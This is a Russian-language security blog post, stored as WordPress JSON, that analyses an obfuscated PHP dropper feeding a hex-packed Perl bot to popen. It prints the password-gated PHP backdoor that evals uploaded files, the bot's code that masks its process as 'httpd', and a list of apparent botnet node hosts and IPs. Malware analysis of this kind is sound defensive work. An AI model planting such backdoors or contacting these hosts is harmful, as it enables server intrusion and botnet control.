{"id":1311,"date":"2012-03-21T15:55:57","date_gmt":"2012-03-21T13:55:57","guid":{"rendered":"http:\/\/netspider.com.ua\/?p=1311"},"modified":"2012-03-21T15:55:57","modified_gmt":"2012-03-21T13:55:57","slug":"skrytie-koda-metod-9","status":"publish","type":"post","link":"https:\/\/netspider.com.ua\/index.php\/2012\/03\/21\/skrytie-koda-metod-9\/","title":{"rendered":"\u0421\u043a\u0440\u044b\u0442\u0438\u0435 \u043a\u043e\u0434\u0430, \u043c\u0435\u0442\u043e\u0434 9"},"content":{"rendered":"

\u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u0435\u043d \u0443 \u0431\u043e\u0442\u043e\u0432\u043e\u0434\u043e\u0432 (\u0442.\u0435. \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u0435\u0439 perl-\u0431\u043e\u0442\u043e\u0432), \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0443 Perl, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c\u043e\u043c\u0443 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 popen():<\/p> 

error_reporting( 1 );\nglobal $HTTP_SERVER_VARS;\nif (@is_resource( $f = @popen( 'perl - E54POCH', "w" ) )) {\n\t@fwrite( $f, 'eval( pack( "H*", "6368...7d20" ) );eval( pack( "H*", "7573...353b"));' );\n\t@fflush( $f );\n\tsleep( 1 );\n\t@pclose( $f );\n\techo "RUN OK";\n} else {\n\techo "RUN FALSE";\n};<\/pre>
\u042d\u0442\u043e\u0442 \u043a\u043e\u0434 \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u0441\u0440\u0435\u0434\u0438 POST-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043f\u0440\u0438 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435 \u0447\u0435\u0440\u0435\u0437 ngrep:<\/p>\n\n
ngrep -tqW byline '^POST'<\/pre>\n\n
\u0421\u0430\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u0442\u0430\u043a:<\/p>\n\n
T date time source-IP:port -> dest-IP:80 [AP]\nPOST https:\/\/domain.tld\/path\/file.php HTTP\/1.0.\nConnection: Close.\nAccept: *\/*.\nHost: domain.tld.\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322).\nContent-Length: 28123.\nContent-Type: multipart\/form-data; boundary=xYzZY.\n.\n--xYzZY.\nContent-Disposition: form-data; name="p".\n.\nOx93Mdpqme8s.\n--xYzZY.\nContent-Disposition: form-data; name="f"; filename="f.txt".\n.\nerror_reporting(1);global $HTTP_SERVER_VARS; if (@is_resource($f=@popen<\/pre>\n\n
\u0414\u043b\u044f \u0443\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0432\u0441\u0435\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0446\u0435\u043b\u0438\u043a\u043e\u043c, file.php \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u043d\u0435\u043d \u043d\u0430 \u0444\u0430\u0439\u043b \u0441 \u043a\u043e\u0434\u043e\u043c:<\/p>\n\n
$upl = "";\n\n$uploaddir = '\/path\/LOGG\/';\n$uploadfile = $uploaddir . date("Ymd-H:i:s") . ".log";\n\nif (move_uploaded_file($_FILES['f']['tmp_name'], $uploadfile)) {\n    echo "Done.\\n";\n    $upl = "File saved as: LOGG\/$uploadfile\\n";\n}\n\nif (isset( $_POST["p"] )) {\n        $logtext = @$_POST["p"];\n        $logtext .= "\\nFile uploaded to: LOGG\\n\\n\/\/------\\n\\n\\n";\n        $fp = fopen('POST.log', 'a+');\n        fwrite($fp, $logtext);\n        fclose($fp);\n}<\/pre>\n\n
\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0435, \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0438 pack() \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0438 eval() \u0431\u0435\u0437 \u043a\u0430\u043a\u0438\u0445-\u0442\u043e \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043b\u043e\u0433\u0438\u0447\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u0442\u0430\u043c \u043f\u0440\u043e\u0441\u0442\u043e \u0442\u0435\u043a\u0441\u0442. \u0420\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0438\u0437 16-\u0440\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u043e\u0440\u043c\u0430\u0442\u0430 \u043c\u043e\u0436\u043d\u043e \u0442\u0430\u043a (\u0432\u0442\u043e\u0440\u0430\u044f \u0447\u0430\u0441\u0442\u044c, \u0442\u0435\u043b\u043e \u0431\u043e\u0442\u0430):<\/p>\n\n
$text = pack( "H*","7573...353b" );\n\n$fp = fopen( 'bintext.dat', 'w' );\nfwrite( $fp, $text );\nfclose( $fp );<\/pre>\n\n
\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0432 bintext.dat \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a perl-\u0431\u043e\u0442\u0430.<\/p>\n\n
\u0410 \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u0430\u0440\u043b\u0435\u0437\u043e\u043d\u0441\u043a\u043e\u0433\u043e \u0431\u0430\u043b\u0435\u0442\u0430<\/strike> \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0437\u0430\u043f\u0443\u0441\u043a \u0431\u043e\u0442\u0430 (\u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434):<\/p>\n\n
chdir '\/';\nopen STDIN, '\/dev\/null';\nopen STDOUT, '>\/dev\/null';\nopen STDERR, '>\/dev\/null';\nmy $pid = fork;\nsleep(1),exit if $pid;\neval "use POSIX 'setsid'; setsid";\neval { $0 = 'httpd' }<\/pre>\n\n
\u0410 \u044d\u0442\u043e \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441\u0430\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 file.php, \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0438\u0441\u044c POST-\u0437\u0430\u043f\u0440\u043e\u0441\u044b:<\/p>\n\n
<?php\nerror_reporting( 1 );\nglobal $HTTP_SERVER_VARS;\nfunction say( $t ) {\n\techo "$t\\n";\n}\nfunction testdata( $t ) {\n\tsay( md5( "testdata_$t" ) );\n}\necho "<pre>";\ntestdata( 'start' );\nif (md5( $_POST["p"] ) == "aace99428c50dbe965acc93f3f275cd3") {\n\tif ($code = @fread( @fopen( $HTTP_POST_FILES["f"]["tmp_name"], "rb" ), $HTTP_POST_FILES["f"]["size"] )) {\n\t\teval( $code );\n\t} else {\n\t\ttestdata( 'f' );\n\t};\n} else {\n\ttestdata( 'pass' );\n}\ntestdata( 'end' );\necho "<\/pre>";\n?><\/pre>\n\n
Botnet<\/h5>\n\n
\u0421\u043f\u0438\u0441\u043e\u043a \u043d\u043e\u0434\u043e\u0432 (\u0443\u0437\u043b\u043e\u0432) \u0438\u0437 \u043e\u0442\u043b\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e perl-\u0431\u043e\u0442\u0430:<\/p>\n\n
foldersys.de:28269 213.203.220.141\ndiplomni.info:21535 94.155.15.10 \nstudio-f3.com:28732 94.155.15.16 \nhpredictor.info:26922 213.169.63.254 \nocci.jp:28331 220.111.38.200 \nbodasytradicion.com:24910 148.243.237.131\nindex.bg:29213 194.12.244.86 \nfoldersys.com:29190 213.203.220.141\nsoderco.com:23722 91.121.84.209 \nsandwichsupermax.com:28710 88.203.156.60 \nnorskemagic.com:29490 213.136.34.26 \ncorenet.artflower.pe.kr:24639 115.68.17.87 \nklobouk.fsv.cvut.cz:23388 147.32.129.99 \nwobo04.de:21931 94.102.218.136 \neurope-webdesign.de:25994 87.238.192.159 \nazidong.com:25679 118.129.167.32\n2001.asadal.com:28910 110.45.146.38\nmedic9000.com:20828 211.115.111.116\ndream-honda.com:20958 124.146.181.181\nbukiba.de:28148 46.4.66.194\nkdhoist.com:28352 121.254.216.163\nsm-werbung.com:27398 85.214.60.161\nwenco-von-der-schlehhecke.de:23856 217.160.222.26\ndmprojects.com:22970 62.80.235.38\nmydesigna.info:21158 85.214.23.182\ninfiniteconstruction.co.th:27179 202.142.223.177\nlegal-alliance.net:27753 211.115.111.116\nkaninchen-zucht.de:21659 62.116.180.6\nakaza-dc.com:25777 211.115.111.116\nsoderco.fr:21617 91.121.84.209\nchemtris.com:20211 110.45.144.57\ndaesansanding.co.kr:25697 203.236.241.184\ntokyo-sr.net:24216 211.115.111.116<\/pre>\n\n
\u0421\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u044d\u0442\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0438\u0441\u0438\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 Perl, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u0434 httpd,  \u0438 \u0436\u0434\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0439.<\/p>","protected":false},"excerpt":{"rendered":"\u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u0435\u043d \u0443 \u0431\u043e\u0442\u043e\u0432\u043e\u0434\u043e\u0432 (\u0442.\u0435. \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u0435\u0439 perl-\u0431\u043e\u0442\u043e\u0432), \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0443 Perl, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c\u043e\u043c\u0443 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 popen(): error_reporting( 1 ); global $HTTP_SERVER_VARS; if (@is_resource( $f = @popen( ‘perl – E54POCH’, "w" ) )) { @fwrite( $f, ‘eval( pack( "H*", "6368…7d20" ) );eval( pack( "H*", "7573…353b"));’ ); @fflush( $f ); sleep( 1 ); @pclose( $f );\u2026 \u0427\u0438\u0442\u0430\u0442\u0438 \u0434\u0430\u043b\u0456 »<\/a><\/span>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[1575,1557,614,665,1568,674,1558,662,1559],"class_list":["post-1311","post","type-post","status-publish","format-standard","hentry","category-main","tag-deobfuscation","tag-obfuscation","tag-perl","tag-php","tag-deobfuskaciya","tag-kod","tag-obfuskaciya","tag-skriptyi","tag-shifrovanie"],"_links":{"self":[{"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/posts\/1311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/comments?post=1311"}],"version-history":[{"count":0,"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/posts\/1311\/revisions"}],"wp:attachment":[{"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/media?parent=1311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/categories?post=1311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/netspider.com.ua\/index.php\/wp-json\/wp\/v2\/tags?post=1311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}